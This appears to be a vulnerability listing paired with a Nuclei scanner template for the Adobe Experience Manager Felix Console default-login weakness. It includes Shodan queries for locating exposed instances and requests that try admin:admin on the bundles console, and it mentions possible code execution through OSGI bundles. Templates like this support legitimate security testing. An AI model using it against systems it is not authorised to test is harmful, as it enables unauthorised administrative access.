Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.
shodan: http.title:"AEM Sign In"
shodan: http.component:"Adobe Experience Manager"
PoC代码[已公开]
id: aem-felix-console
info:
name: Adobe Experience Manager Felix Console - Default Login
author: DhiyaneshDk
severity: high
description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.
reference:
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
- https://github.com/0ang3el/aem-rce-bundle
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
product: experience_manager_cloud_service
vendor: adobe
tags: default-login,misconfig,aem,adobe,vuln
http:
- method: GET
path:
- "{{BaseURL}}/system/console/bundles"
- "{{BaseURL}}///system///console///bundles"
headers:
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Adobe Experience Manager Web Console - Bundles</title>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a004830460221009bf4fea628945c6e857b142a4727fd40ee730835c9d5cf02cc4cbf3c8cc7b459022100aae0f6b07a80b1d2558b3b75a536cb4601466df47d07e76fd3b19182d300a156:922c64590222798bb761d5b6d8e72950